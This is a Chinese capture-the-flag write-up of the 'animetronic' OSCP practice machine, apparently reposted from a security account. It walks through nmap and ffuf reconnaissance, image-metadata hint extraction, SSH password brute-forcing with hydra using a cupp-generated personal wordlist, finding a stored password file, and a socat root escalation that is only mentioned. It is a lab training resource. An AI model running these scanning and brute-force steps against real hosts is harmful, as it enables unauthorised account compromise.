【OSCP】animetronic

OSCP 靶场

靶场介绍

信息收集

主机发现

nmap -sn 192.168.31.0/24

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.187
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-11 12:13 EST
Nmap scan report for 192.168.31.187
Host is up (0.00046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)
|_  256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Animetronic
MAC Address: 08:00:27:B8:CD:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.31.187

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.98 seconds

目录扫描

扫描到一个staffpages页面，再扫描二级目录获取到new_employees目录，打开是一张图片

┌──(root㉿kali)-[~]
└─#  ffuf -u http://192.168.31.187/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt     -c -e .php,.txt,.js,.html  -fs 2384

        /'___  /'___           /'___       
       / __/ / __/  __  __  / __/       
         ,__\  ,__/ /    ,__      
          _/   _/  _    _/      
          _    _   ____/   _       
          /_/    /_/   /___/    /_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.31.187/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt .js .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 2384
________________________________________________

[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]
    * FUZZ: .php

[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]
    * FUZZ: .html

[Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 1ms]
    * FUZZ: img

[Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 0ms]
    * FUZZ: css

[Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 0ms]
    * FUZZ: js

[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 1ms]
    * FUZZ: .php

[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 4ms]
    * FUZZ: .html

[Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 0ms]
    * FUZZ: staffpages

[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]
    * FUZZ: server-status

:: Progress: [1102800/1102800] :: Job [1/1] :: 13333 req/sec :: Duration: [0:01:35] :: Errors: 0 ::

ffuf -u http://192.168.31.187/staffpages/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt     -c -e .php,.txt,.js,.html  -fs 2384

下载图片，exiftool 读取隐写信息，解码后获取到 ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן ，反过来看message_for_michael

exiftool new_employees.jpeg

http://192.168.31.187/staffpages/message_for_michael

访问后得到一个personal_info.txt，得到一个Michael 用户名

权限获取

使用rockyou.txt 字典进行hydra 爆破失败，利用cupp 生成社工字典重新进行爆破，成功获取账号密码。

hydra -l michael -P /usr/share/wordlists/rockyou.txt    ssh://192.168.31.187

└─# cupp -i
 ___________ 
   cupp.py!                 # Common
                           # User
          ,__,             # Passwords
          (oo)____         # Profiler
           (__)    )   
              ||--|| *      [ Muris Kurgas | [email protected] ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: michael
> Surname: 
> Nickname: 
> Birthdate (DDMMYYYY): 19101996


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: y
> Do you want to add special chars at the end of words? Y/[N]: 
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 1510 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!
                                                                                                                                                                                       

hydra -l michael -P michael.txt ssh://192.168.31.187

获取账号密码后，登录michael用户

权限提升

进入henry 获取flag，还获取note.txt 提示信息，为该账号的密码

find / -type f -name "henrypassword.txt" 2>/dev/null
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt 
IHateWilliam

利用socat 提权到root 权限，成功获取到root.txt flag

原文始发于微信公众号（贝雷帽SEC）：【OSCP】animetronic